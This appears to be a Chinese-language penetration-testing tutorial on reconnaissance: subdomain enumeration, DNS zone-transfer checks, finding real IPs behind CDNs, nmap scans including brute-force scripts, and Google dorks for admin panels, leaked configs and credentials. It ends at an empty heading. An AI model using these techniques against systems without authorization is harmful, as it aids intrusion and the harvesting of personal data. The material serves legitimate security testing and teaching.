![](img/1594459-20200119141656601-1094084026.png)
# 收集相关应用信息
天眼查 https://www.tianyancha.com/
企查查 https://www.qichacha.com/
## 微信公众号&微博
### 天眼查
根据前面获取的企业名称可以获取目标企业的微信公众号、微博、备案站点、软件著作权等信息。
天眼查-商业安全工具 https://www.tianyancha.com/
![](img/1594459-20200119141713825-233472966.png)
微信公众号
![](img/1594459-20200119141726618-1965423664.png)
微博
![](img/1594459-20200119141739367-2099794631.png)
## APP
### 七麦数据
https://www.qimai.cn/
通过当前APP查询同开发商应用,得到目标所有APP应用
![](img/1594459-20200119141752877-1887884798.png)
### AppStore
https://apps.apple.com/
通过当前APP查询同开发商应用,得到目标所有APP应用
![](img/1594459-20200119141813027-1838023080.png)
# 收集子域名信息
子域名也就是二级域名,是指顶级域名下的域名。假设我们的目标网络规模比较大,直接从主域入手显然是很不理智的,因为对于这种规模的目标,一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迂回接近真正的目标,这无疑是个比较好的选择。那么问题来了,怎样才能尽可能多地搜集目标的高价值子域呢?常用的方法有以下这几种。
## 在线平台
### 第三方平台查询
主要是一些第三方网站和一些博主提供的服务
```
ip138 https://site.ip138.com/
站长工具 http://tool.chinaz.com/subdomain/?domain=
hackertarget https://hackertarget.com/find-dns-host-records/
phpinfo https://phpinfo.me/domain/
t1h2ua https://www.t1h2ua.cn/tools/
dnsdumpster https://dnsdumpster.com/
chinacycc https://d.chinacycc.com/
zcjun http://z.zcjun.com/
```
### 权重综合查询
爱站 https://www.aizhan.com/seo/
站长工具 http://rank.chinaz.com/all/
![](img/1594459-20200119141832218-1345938531.png)
### 全国政府网站基本数据库
http://114.55.181.28/databaseInfo/index
![](img/1594459-20200119141843251-1646076497.png)
### IP反查绑定域名网站
IP关联域名,大部分网站一个IP多个域名
```
http://s.tool.chinaz.com/same?s
http://dns.aizhan.com/
https://webscan.cc/
```
## 资产搜索引擎
google、shodan、FOFA、zoomeye
### Google语法查询
搜索子域名 "site:xxxxx"
```
site:baidu.com
```
![](img/1594459-20200119141902637-725688631.png)
### FOFA语法查询
https://fofa.so/
搜索子域名 "domain:xxxxx"
```
domain="baidu.com"
```
![](img/1594459-20200119141919931-1425149530.png)
## 工具枚举
常用子域名工具如下(Github上都可搜到)
```
OneForAll
Layer
Sublist3r
subDomainsBrute
K8
wydomain
dnsmaper
dnsbrute
Findomain
fierce等
```
个人推荐:`OneForAll`、`Layer`、`Sublist3r`、`subDomainsBrute`
### OneForAll
OneForAll是一款功能强大的子域收集工具,拥有多个模块和接口扫描,收集子域信息很全,包括子域、子域IP、子域常用端口、子域Title、子域Banner、子域状态等。
项目地址:`https://github.com/shmilylty/OneForAll`
子域名收集:`python3 oneforall.py --target=target.com run`
![](img/1594459-20200119141949690-706245006.png)
### Layer
Layer子域名挖掘机的使用方法比较简单,在域名对话框中直接输入域名就可以进行扫描,它的显示界面比较细致,有域名、解析IP、开放端口、Web服务器和网站状态等
![](img/1594459-20200119142000597-497061730.png)
### subDomainsBrute
subDomainsBrute的特点是可以用小字典递归地发现三级域名、四级域名,甚至五级域名等不容易被探测到的域名。
项目地址:`https://github.com/lijiejie/subDomainsBrute`
子域名收集:`python subDomainsbrute.py xtarget.com`
### Sublist3r
Sublist3r也是一个比较常用的工具, 它能列举多种资源,如在Google、Yahoo、 Bing、 Baidu和Ask等搜索引擎中可查到的子域名,还可以列出Netcraft、VirusTotal、ThreatCrowd、 DNSdumpster、SSL Certificates、和Reverse DNS查到的子域名。
项目地址:`https://github.com/aboul3la/Sublist3r`
子域名收集:`python sublist3r.py -d target.com -b -t 50 -p 80,443,21,22`
![](img/1594459-20200119142016505-176536179.png)
## 证书透明度公开日志枚举
证书透明度(Certificate Transparency, CT)是证书授权机构(CA) 的一个项目,证书授权机构会将每个SSL/TLS证书发布到公共日志中。一个SSL/TLS证书通常包含域名、子域名和邮件地址, 这些也经常成为攻击者非常希望获得的有用信息。查找某个域名所属证书的最简单的方法就是使用搜索引|擎搜索一些公开的CT日志。
### 在线第三方平台查询
```
crt.sh: https://crt.sh
censys: https://censys.io
myssl:https://myssl.com
```
```
crt:
https://crt.sh/?q=baidu.com
```
![](img/1594459-20200119142032842-592842557.png)
![](img/1594459-20200119142046971-121764509.png)
```
censys:
https://www.censys.io/certificates?q=baidu.com
```
![](img/1594459-20200119142058672-37856097.png)
### 工具枚举查询
通过工具可以调用各个证书接口进行域名查询
常用工具
```
Findomain
Sublist3r(SSL Certificates)等
```
#### Findomain
Findomain不使用子域名寻找的常规方法,而是使用证书透明度日志来查找子域,并且该方法使其工具更加快速和可靠。该工具使用多个公共API来执行搜索:
```
Certspotter
Crt.sh
Virustotal
Sublist3r
Facebook
Spyse (CertDB)
Bufferover
Threadcrow
Virustotal with apikey
```
项目地址:`https://github.com/Edu4rdSHL/findomain`
子域名收集:`findomain -t target.com `
使用所有API搜索子域并将数据导出到CSV文件:`findomain -t target.com -a -o csv`
## DNS历史解析
dnsdb https://www.dnsdb.io
viewdns https://viewdns.info/
## DNS域传送漏洞
目前来看"DNS域传送漏洞"已经很少了。
### DNS记录分类
常见的DNS记录有以下几类:
```
A记录 IP地址记录,记录一个域名对应的IP地址
AAAA记录 IPv6地址记录,记录一个域名对应的IPv6地址
CNAME记录 别名记录,记录一个主机的别名
MX记录 电子邮件交换记录,记录一个邮件域名对应的IP地址
NS记录 域名服务器记录 ,记录该域名由哪台域名服务器解析
PTR记录 反向记录,也即从IP地址到域名的一条记录
TXT记录 记录域名的相关文本信息
```
### DNS注册信息
Whois查询
### DNS域传送漏洞原理
DNS服务器分为:`主服务器`、`备份服务器`和`缓存服务器`。在主备服务器之间同步数据库,需要使用`“DNS域传送”`。域传送是指备份服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。
若DNS服务器配置不当,可能导致攻击者获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器。同时,黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻击目标,找出未使用的IP地址,绕过基于网络的访问控制。
### DNS域传送漏洞检测
#### nslookup
基本过程
```
1) nslookup #进入交互式shell
2) server dns.xx.yy.zz #设定查询将要使用的DNS服务器
3) ls xx.yy.zz #列出某个域中的所有域名
4) exit #退出
```
漏洞检验-不存在漏洞
```
> nslookup
Server: lkwifi.cn
Address: 192.168.68.1
*** lkwifi.cn can't find nslookup: Non-existent domain
> server ss2.bjfu.edu.cn
Default Server: ss2.bjfu.edu.cn
Address: 202.204.112.67
> ls bjfu.edu.cn
[ss2.bjfu.edu.cn]
*** Can't list domain bjfu.edu.cn: Query refused
The DNS server refused to transfer the zone bjfu.edu.cn to your computer. If this
is incorrect, check the zone transfer security settings for bjfu.edu.cn on the DNS
server at IP address 202.204.112.67.
> exit
```
漏洞检验-存在漏洞
```
> nslookup
> server dns1.xxx.edu.cn
> ls xxx.edu.cn
```
![](img/1594459-20200119142122378-365876425.png)
#### nmap
利用nmap漏洞检测脚本"dns-zone-transfer"进行检测
```
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxx.edu.cn -p 53 -Pn dns.xxx.edu.cn
```
```
--script dns-zone-transfer 表示加载nmap漏洞检测脚本dns-zone-transfer.nse,扩展名.nse可省略
--script-args dns-zone-transfer.domain=xxx.edu.cn 向脚本传递参数,设置列出某个域中的所有域名
-p 53 设置扫描53端口
-Pn 设置通过Ping发现主机是否存活
```
![](img/1594459-20200119142135615-565066925.png)
#### dig
使用说明 `dig -h`
漏洞测试
```
dig @dns.xxx.edu.cn axfr xxx.edu.cn
```
`axfr` 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。
![](img/1594459-20200119142148997-23789284.png)
# 查找真实IP
如果挖掘的目标购买了CDN服务,可以直接ping目标的域名,但得到的并非真正的目标Web服务器,只是离我们最近的一台目标节点的CDN服务器,这就导致了我们没法直接得到目标的真实IP段范围。
## CDN简介
CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。
## 国内外CND
国内常见CDN
```
阿里云
腾讯云
百度云
网宿科技(ChinanNet Center)
蓝汛
金山云
UCloud
网易云
世纪互联
七牛云
京东云等
```
国外常见CDN
```
Akamai(阿卡迈)
Limelight Networks(简称LLNW)
AWS Cloud(亚马逊)
Google(谷歌)
Comcast(康卡斯特)
```
## 判断目标是否存在CDN
由于CDN需要代价,一般小企业很大几率不会存在CDN服务。
假如一些企业存在CDN服务,那该如何寻找其真实IP呢,往下看,常见几种手法
### Ping目标主域
通常通过ping目标主域,观察域名的解析情况,以此来判断其是否使用了CDN
对京东和阿里还有一家电器企业进行ping测试,观察域名的解析情况,可以看到京东和阿里都采用了自家CDN,而那个电器企业没有CDN服务
```
C:\Users\Qftm>ping www.jd.com
C:\Users\Qftm>ping www.alibaba.com
C:\Users\Qftm>ping www.dfle.com.cn
```
![](img/1594459-20200119142212459-2087766300.png)
### Nslookup
#### 不同DNS域名解析
不同DNS域名解析情况对比,判断其是否使用了CDN
不同DNS解析结果若不一样,很有可能存在CDN服务
```
C:\Users\Qftm>nslookup www.dfle.com.cn 8.8.8.8
C:\Users\Qftm>nslookup www.dfle.com.cn 114.114.114.114
```
![](img/1594459-20200119142328428-196307471.png)
```
λ Qftm >>>: nslookup www.baidu.com 8.8.8.8
λ Qftm >>>: nslookup www.baidu.com 114.114.114.114
```
![](img/1594459-20200119142343947-148948923.png)
#### nslookup默认解析
若解析结果有多个,很有可能存在CDN,相反,若解析结果有一个,可能不存在CDN(不能肯定)
![](img/1594459-20200119142357248-1150922309.png)
### 全国Ping
利用全国多地区的ping服务器操作,然后对比每个地区ping出的IP结果,查看这些IP是否一致, 如果都是一样的,极有可能不存在CDN。如果IP大多不太一样或者规律性很强,可以尝试查询这些IP的归属地,判断是否存在CDN。
在线网址
```
Ping检测-站长工具 http://ping.chinaz.com/
17CE https://www.17ce.com/
ipip https://tools.ipip.net/newping.php (支持国内、国外)
```
#### 站长工具
测试目标:`www.jd.com`
![](img/1594459-20200119142412648-1190613587.png)
#### 17CE
测试目标:`www.baidu.com`
![](img/1594459-20200119142428869-1621577710.png)
#### IPIP
![](img/1594459-20200119142440363-2056134896.png)
### 工具查询
这里工具只能作为辅助,有一定误报的概率,只能作为参考
#### Cdnplanet
cdnplanet https://www.cdnplanet.com/tools/cdnfinder/ (查询可能比较慢)
![](img/1594459-20200119142452928-266810115.png)
## 绕过CDN查找真实IP
在确认了目标确实用了CDN以后,就需要绕过CDN寻找目标的真实IP,下面介绍一些常规的方法。
### 内部邮箱源
一般的邮件系统都在内部,没有经过CDN的解析,通过利用目标网站的邮箱注册、找回密码或者RSS订阅等功能,查看邮件、寻找邮件头中的邮件服务器域名IP,ping这个邮件服务器的域名,就可以获得目标的真实IP。
注意:必须是目标自己的邮件服务器,第三方或公共邮件服务器是没有用的。
![](img/1594459-20200119142511035-408073430.png)
### 国外请求
很多时候国内的CDN对国外得覆盖面并不是很广,故此可以利用此特点进行探测。通过国外代理访问就能查看真实IP了,或者通过国外的DNS解析,可能就能得到真实的IP。
#### 国际Ping
国际ping测试站点
```
ipip https://tools.ipip.net/newping.php
ASM https://asm.ca.com/en/ping.php
```
测试站点:`www.yeah.net`
![](img/1594459-20200119142526549-567642204.png)
#### 国外DNS解析
世界各地DNS服务器地址大全:`http://www.ab173.com/dns/dns_world.php`
测试站点:`www.yeah.net`
美国加利福尼亚州山景市谷歌公司DNS服务器: `8.8.4.4`
![](img/1594459-20200119142541360-1030049461.png)
### 分站域名&C段查询
很多网站主站的访问量会比较大,所以主站都是挂CDN的,但是分站可能没有挂CDN,可以通过ping二级域名获取分站IP, 可能会出现分站和主站不是同一个IP但在同一个C段下面的情况,从而能判断出目标的真实IP段。
#### 分站域名
具体见上面**<收集子域名信息>**部分
![](img/1594459-20200119142552726-920748840.png)
#### C段查询
* 在线查询
```
https://phpinfo.me/bing.php
```
![](img/1594459-20200119142607848-1081123689.png)
* 工具
`K8_C段旁注工具6.0`、`nmap`、`IISPutScanner`、`小米范WEB查找器` 等
`小米范WEB查找器`:http://pan.baidu.com/s/1pLjaQKF
![](img/1594459-20200119142618307-1998638289.png)
* 网络资产搜索引擎
Fofa、Shodan、ZoomEye
利用这些网络空间资产搜索引擎来搜索暴露在外的端口信息
利用语法搜索C段信息
![](img/1594459-20200119142628605-1817173510.png)
### 网站漏洞
通过网站的信息泄露如phpinfo泄露,github信息泄露,命令执行等漏洞获取真实ip。
#### 一些测试文件
phpinfo、test等
![](img/1594459-20200119142643031-2126170556.png)
#### SSRF漏洞
服务器主动向外发起连接,找到真实IP地址
### 查询域名解析记录
一般网站从部署开始到使用cdn都有一个过程,周期如果较长的话 则可以通过这类历史解析记录查询等方式获取源站ip,查看IP与域名绑定的历史记录,可能会存在使用CDN前的记录。
在线网站查询
```
dnsdb https://www.dnsdb.io
NETCRAFT https://sitereport.netcraft.com/?url=
viewdns https://viewdns.info/
threatbook https://x.threatbook.cn/
securitytrails https://securitytrails.com/
```
![](img/1594459-20200119142656200-2052041466.png)
### 目标网站APP应用
如果目标网站有自己的App,可以尝试利用Fiddler或Burp Suite抓取App的请求,从里面找到目标的真实IP。
### 网络空间引擎搜索
shodan、FOFA、zoomeye
# 收集常用端口信息
在对目标进行漏洞挖掘的过程中,对端口信息的收集是一个很重要的过程, 通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于我们渗透目标服务器。
所以在端口渗透信息的收集过程中,我们需要关注常见应用的默认端口和在端口上运行的服务。
端口一般是指TCP/IP协议中的端口,端口号的范围是从0-65535。
## 常见端口&解析&总结
常用的端口利用及解析总结
```
端口:21 服务:FTP/TFTP/VSFTPD 总结:爆破/嗅探/溢出/后门
端口:22 服务:ssh远程连接 总结:爆破/openssh漏洞
端口:23 服务:Telnet远程连接 总结:爆破/嗅探/弱口令
端口:25 服务:SMTP邮件服务 总结:邮件伪造
端口:53 服务:DNS域名解析系统 总结:域传送/劫持/缓存投毒/欺骗
端口:67/68 服务:dhcp服务 总结:劫持/欺骗
端口:110 服务:pop3 总结:爆破/嗅探
端口:139 服务:Samba服务 总结:爆破/未授权访问/远程命令执行
端口:143 服务:Imap协议 总结:爆破161SNMP协议爆破/搜集目标内网信息
端口:389 服务:Ldap目录访问协议 总结:注入/未授权访问/弱口令
端口:445 服务:smb 总结:ms17-010/端口溢出
端口:512/513/514 服务:Linux Rexec服务 总结:爆破/Rlogin登陆
端口:873 服务:Rsync服务 总结:文件上传/未授权访问
端口:1080 服务:socket 总结:爆破
端口:1352 服务:Lotus domino邮件服务 总结:爆破/信息泄漏
端口:1433 服务:mssql 总结:爆破/注入/SA弱口令
端口:1521 服务:oracle 总结:爆破/注入/TNS爆破/反弹shell2049Nfs服务配置不当
端口:2181 服务:zookeeper服务 总结:未授权访问
端口:2375 服务:docker remote api 总结:未授权访问
端口:3306 服务:mysql 总结:爆破/注入
端口:3389 服务:Rdp远程桌面链接 总结:爆破/shift后门
端口:4848 服务:GlassFish控制台 总结:爆破/认证绕过
端口:5000 服务:sybase/DB2数据库 总结:爆破/注入/提权
端口:5432 服务:postgresql 总结:爆破/注入/缓冲区溢出
端口:5632 服务:pcanywhere服务 总结:抓密码/代码执行
端口:5900 服务:vnc 总结:爆破/认证绕过
端口:6379 服务:Redis数据库 总结:未授权访问/爆破
端口:7001/7002 服务:weblogic 总结:java反序列化/控制台弱口令
端口:80/443 服务:http/https 总结:web应用漏洞/心脏滴血
端口:8069 服务:zabbix服务 总结:远程命令执行/注入
端口:8161 服务:activemq 总结:弱口令/写文件
端口:8080/8089 服务:Jboss/Tomcat/Resin 总结:爆破/PUT文件上传/反序列化
端口:8083/8086 服务:influxDB 总结:未授权访问
端口:9000 服务:fastcgi 总结:远程命令执行
端口:9090 服务:Websphere 总结:控制台爆破/java反序列化/弱口令
端口:9200/9300 服务:elasticsearch 总结:远程代码执行
端口:11211 服务:memcached 总结:未授权访问
端口:27017/27018 服务:mongodb 总结:未授权访问/爆破
```
详细参考:[掘安攻防实验室](https://mp.weixin.qq.com/s/Y0PPqyHysBPmgmDw2KmHYw)
## 扫描工具
### 常用扫描工具
```
Nmap
Masscan
ZMap
御剑高速TCP端口扫描工具
御剑高速端口扫描工具
IISPutScanner
IISPutScanner增强版-DotNetScan v1.1 Beta
masnmapscan
```
### 常用扫描工具使用
#### nmap
项目地址:`https://github.com/nmap/nmap`
* 扫描多个IP
```
扫描整个子网 nmap 192.168.6.1/24
nmap 192.168.1.1/16
nmap 192.168.1-30.1-254
nmap 192.168.1-254.6
扫描多个主机 namp 192.168.6.2 192.168.6.6
扫描一个小范围 nmap 192.168.6.2-10
扫描txt内的ip列表 nmap -iL text.txt
扫描除某个目标外 nmap 192.168.6.1/24 -exclude 192.168.6.25
```
* 绕过Firewalld扫描主机端口
通过不同的协议(TCP半连接、TCP全连接、ICMP、UDP等)的扫描绕过Firewalld的限制
```
nmap -sP 192.33.6.128
nmap -sT 192.33.6.128
nmap -sS 192.33.6.128
nmap -sU 192.33.6.128
nmap -sF 192.33.6.128
nmap -sX 192.33.6.128
nmap -sN 192.33.6.128
```
* 初步扫描端口信息
```
nmap -T4 -A -v -Pn 192.168.1.1/24 -p 21,22,23,25,80,81,82,83,88,110,143,443,445,512,513,514,1433,1521,2082,2083,2181,2601,2604,3128,3306,3389,3690,4848,5432,5900,5984,6379,7001,7002,8069,8080,8081,8086,8088,9200,9300,11211,10000,27017,27018,50000,50030,50070 -oN nmap_result.txt
```
![](img/1594459-20200119150735085-1154381786.png)
* 扫描端口并且标记可以爆破的服务
```
nmap 127.0.0.1 --script=ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute
```
![](img/1594459-20200119142721442-1575053305.png)
* 判断常见的漏洞并扫描端口
```
nmap 127.0.0.1 --script=auth,vuln
```
![](img/1594459-20200119142731949-1278292617.png)
* 精确判断漏洞并扫描端口
```
nmap 127.0.0.1 --script=dns-zone-transfer,ftp-anon,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-backup-finder,http-cisco-anyconnect,http-iis-short-name-brute,http-put,http-php-version,http-shellshock,http-robots.txt,http-svn-enum,http-webdav-scan,iis-buffer-overflow,iax2-version,memcached-info,mongodb-info,msrpc-enum,ms-sql-info,mysql-info,nrpe-enum,pptp-version,redis-info,rpcinfo,samba-vuln-cve-2012-1182,smb-vuln-ms08-067,smb-vuln-ms17-010,snmp-info,sshv1,xmpp-info,tftp-enum,teamspeak2-version
```
#### Masscan
项目地址:`https://github.com/robertdavidgraham/masscan`
Masscan主要是真对全网进行端口扫描
#### Zmap
项目地址:`https://github.com/zmap/zmap`
Zmap主要是真对全网进行端口扫描
#### 御剑高速TCP端口扫描工具
![](img/1594459-20200119142744950-434617774.png)
#### 御剑高速端口扫描工具
![](img/1594459-20200119142757545-1040489796.png)
#### masnmapscan
项目地址:`https://github.com/hellogoldsnakeman/masnmapscan-V1.0`
masnmapscan整合了masscan和nmap两款扫描器,masscan扫描端口,nmap扫描端口对应服务,二者结合起来实现了又快又好地扫描。并且加入了针对目标资产有防火墙的应对措施。
### 网络空间引擎搜索
shodan、FOFA、zoomeye
FOFA为例
https://fofa.so/
![](img/1594459-20200119142808985-1292014262.png)
### 浏览器插件
通过Google、FireFox等插件的使用,收集主机端口开放信息
#### Shodan
![](img/1594459-20200119142819024-1802418948.png)
#### TCPIPUTILS
![](img/1594459-20200119142829090-1787287221.png)
#### DNSlytics.
![](img/1594459-20200119142839382-1486144346.png)
# 指纹识别
在漏洞挖掘中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。
CMS (Content Management System)又称整站系统或文章系统。常见的CMS有Dedecms (织梦)、Discuz、 PHPWEB、 PHPWind、PHPCMS、ECShop、 Dvbbs、 SiteWeaver、 ASPCMS、帝国、Z- Blog、WordPress等。
## 第三方平台
云悉 http://www.yunsee.cn/
TideFinger http://finger.tidesec.net/
BugScaner http://whatweb.bugscaner.com/look/
数字观星 https://fp.shuziguanxing.com/#/
![](img/1594459-20200119142854987-277705405.png)
## 工具
常用指纹识别工具有:`御剑Web指纹识别`、`WhatWeb`、`Test404轻量CMS指纹识别+v2.1`、`椰树`等,可以快速识别一些主流CMS
![](img/1594459-20200119142905515-1626640337.png)
Github项目
```
[CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)
[CMSmap](https://github.com/Dionach/CMSmap)
[ACMSDiscovery](https://github.com/aedoo/ACMSDiscovery)
[TideFinger](https://github.com/TideSec/TideFinger)
[AngelSword](https://github.com/Lucifer1993/AngelSword)
```
![](img/1594459-20200119152155149-1636869790.png)
## 浏览器插件
通过Google、FireFox等插件的使用,收集网站结构信息
### Wappalyzer
![](img/1594459-20200119142916899-799352136.png)
# 收集敏感信息
## WAF识别
识别网站使用的什么WAF,可以去找相应的绕过手段
### wafw00f
项目地址:https://github.com/EnableSecurity/wafw00f
![](img/1594459-20200119142930233-1332790706.png)
## 源码泄露
### 常见源码泄露
```
/.bzr/
/CVS/Entries
/CVS/Root
/.DS_Store MacOS自动生成
/.hg/
/.svn/ (/.svn/entries)
/.git/
/WEB-INF/src/
/WEB-INF/lib/
/WEB-INF/classes/
/WEB-INF/database.properties
/WEB-INF/web.xml
Robots.txt
```
上述源码泄露在Github上都可以找到相应的利用工具
### 源码泄露扫描工具
将常见源码泄露加入字典配合FUZZ、御剑等扫描器进行扫描收集
### 源码泄露利用工具
.git源码泄露:https://github.com/lijiejie/GitHack
.DS_Store泄露:https://github.com/lijiejie/ds_store_exp
.bzr、CVS、.svn、.hg源码泄露:https://github.com/kost/dvcs-ripper
## 备份文件泄露
### 网站备份文件泄露常见名称
```
backup
db
data
web
wwwroot
database
www
code
test
admin
user
sql
```
### 网站备份文件泄露常见后缀
```
.bak
.html
_index.html
.swp
.rar
.txt
.zip
.7z
.sql
.tar.gz
.tgz
.tar
```
### 网站备份文件泄露扫描工具
常见扫描工具有:Test404网站备份文件扫描器 v2.0、ihoneyBakFileScan等
ihoneyBakFileScan v0.2 多进程批量网站备份文件泄露扫描工具,根据域名自动生成相关扫描字典,自动记录扫描成功的备份地址到文件
![](img/1594459-20200119142945747-1732902549.png)
## Google Hacking
### 常用GoogleHacking语法
1、intext:(仅针对Google有效)
把网页中的正文内容中的某个字符作为搜索的条件
2、intitle:
把网页标题中的某个字符作为搜索的条件
3、cache:
搜索搜索引擎里关于某些内容的缓存,可能会在过期内容中发现有价值的信息
4、filetype/ext:
指定一个格式类型的文件作为搜索对象
5、inurl:
搜索包含指定字符的URL
6、site:
在指定的(域名)站点搜索相关内容
### 其他GoogleHacking语法
1、引号 '' "
把关键字打上引号后,把引号部分作为整体来搜索
2、or
同时搜索两个或更多的关键字
3、link
搜索某个网站的链接 link:baidu.com即返回所有和baidu做了链接的URL
4、info
查找指定站点的一些基本信息
### GoogleHacking典型用法
- 管理后台地址
```
site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system
site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend
site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录
```
- 上传类漏洞地址
```
site:target.com inurl:file
site:target.com inurl:upload
```
- 注入页面
```
site:target.com inurl:php?id=
```
- 编辑器页面
```
site:target.com inurl:ewebeditor
```
- 目录遍历漏洞
```
site:target.com intitle:index.of
```
- SQL错误
```
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:”Warning: mysql_query()" | intext:”Warning: pg_connect()"
```
- phpinfo()
```
site:target.com ext:php intitle:phpinfo "published by the PHP Group"
```
- 配置文件泄露
```
site:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini
```
- 数据库文件泄露
```
site:target.com ext:.sql | .dbf | .mdb | .db
```
- 日志文件泄露
```
site:target.com ext:.log
```
- 备份和历史文件泄露
```
site:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar
```
- 公开文件泄露
```
site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv
```
- 邮箱信息
```
site:target.com intext:@target.com
site:target.com 邮件
site:target.com email
```
- 社工信息
```
site:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证
```
![](img/1594459-20200119152425254-1738721113.png)
## JS获取敏感接口
### JSFinder
JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。
- 安装
```
pip3 install requests bs4
git clone https://github.com/Threezh1/JSFinder.git
```
- 使用
```
python3 JSFinder.py -u http://www.mi.com
python3 JSFinder.py -u http://www.mi.com -d
```
![](img/1594459-20200119152940819-547890202.png)
### LinkFinder
该工具通过网站中的JS文件来发现服务端、敏感信息、隐藏控制面板的URL链接等有用信息,可最大化地提高URL发现效率
- 安装
```
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder
python2 setup.py install
```
- 使用
在线JavaScript文件中查找端点的最基本用法,并将结果输出到results.html:
```
python linkfinder.py -i https://example.com/1.js -o results.html
```
CLI输出(不使用jsbeautifier,这使得它非常快):
```
pyhon linkfinder.py -i https://example.com/1.js -o cli
```
分析整个域及其JS文件:
```
python linkfinder.py -i https://example.com -d
```
Burp输入(在目标中选择要保存的文件,右键单击,Save selected items将该文件作为输入):
```
python linkfinder.py -i burpfile -b
```
枚举JavaScript文件的整个文件夹,同时查找以/ api /开头的终结点,并最终将结果保存到results.html:
```
python linkfinder.py -i 'Desktop/*.js' -r ^/api/ -o results.html
```
![](img/1594459-20200119153545222-989750205.png)
## 目录&后台扫描
常用工具-自己
```
7kbscan-WebPathBrute https://github.com/7kbstorm/7kbscan-WebPathBrute
DirMap https://github.com/H4ckForJob/dirmap
dirsearch https://github.com/maurosoria/dirsearch
Fuzz-gobuster https://github.com/OJ/gobuster
Fuzz-dirbuster OWASP kali自带
Fuzz-wfuzz https://github.com/xmendez/wfuzz
Test404轻量后台扫描器+v2.0
御剑
```
个人比较喜欢使用Fuzz大法,不管是目录扫描、后台扫描、Web漏洞模糊测试都是非常灵活的。这几款fuzz工具都比较好用
```
基于Go开发:gobuster
基于Java开发:dirbuster
基于Python开发:wfuzz
```
- dirbuster
![](img/1594459-20200119155315684-2055799224.png)
- wfuzz
![](img/1594459-20200119155738473-643631035.png)
工具无论再多再好,没有一个好的字典一切都是空谈。强大字典是需要自己平时慢慢的积累。
## 越权查询
遍历uid获得身份信息等
## 代码托管
通过代码托管平台搜索敏感信息(内部邮箱账号密码、数据库账号密码等)
- github
GitHub是一个面向开源及私有软件项目的托管平台。
平台地址:https://github.com/
GitHub敏感信息泄露一直是企业信息泄露和知识产权泄露的重灾区,安全意识薄弱的同事经常会将公司的代码、各种服务的账户等极度敏感的信息『开源』到github中,github也是黑、白帽子、安全工程师的必争之地。
Github泄露扫描系统开发:https://sec.xiaomi.com/article/37
在GitHub中一般通过搜索网站域名、网站JS路径、网站备案、网站下的技术支持等进行敏感信息查询
![](img/1594459-20200119162240355-550566948.png)
- gitee
平台地址:https://gitee.com/
码云:开源中国出品的代码托管、协作开发平台。
- gitcafe
GitCafe一个基于代码托管服务打造的技术协作与分享平台
## Whois&备案查询
通过Whois和备案查询得到网站的注册人、手机号、邮箱等(对后续的密码生成和社工很有帮助)
## 公网网盘
公司员工可能把一些内部资料放在了公网网盘,然后被在线云网盘搜索的网站抓取了,我们就可以利用这个来对目标系统进行深入挖掘。
可以利用云网盘搜索工具搜集敏感文件,一般直接输入厂商名字进行搜索
### 凌风云搜索
地址:https://www.lingfengyun.com/
![](img/1594459-20200119143019466-1878206759.png)
## 网站截图
对目标网站页面进行截图,通过截图找到敏感页面
### webscreenshot
基于[`url-to-image`](https://github.com/kimmobrunfeldt/url-to-image/)的网站截图工具
- 安装
```
git clone https://github.com/maaaaz/webscreenshot.git
apt-get update && apt-get -y install phantomjs
phantomjs -v
Ubuntu 16 中安装 phantomjs 出现 QXcbConnection 问题
export QT_QPA_PLATFORM=offscreen
export QT_QPA_FONTDIR=/usr/share/fonts
```
- 使用
```
cd webscreenshot/
python2.7 webscreenshot.py -i url.txt
```
![](img/1594459-20200119161002755-701856606.png)
## 获取公开文件
### snitch
Snitch可以针对指定域自动执行信息收集过程。此工具可帮助收集可通过Web搜索引擎找到的指定信息。在渗透测试的早期阶段,它可能非常有用。
- 安装
```
git clone https://github.com/Smaash/snitch.git
```
- 使用
```
python2.7 snitch.py -C "site:whitehouse.gov filetype:pdf" -P 100
```
![](img/1594459-20200119161531465-1731396088.png)
### Google Hacking
```
site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv
```
![](img/1594459-20200119161241851-445496927.png)
## 邮箱信息收集
### Infoga
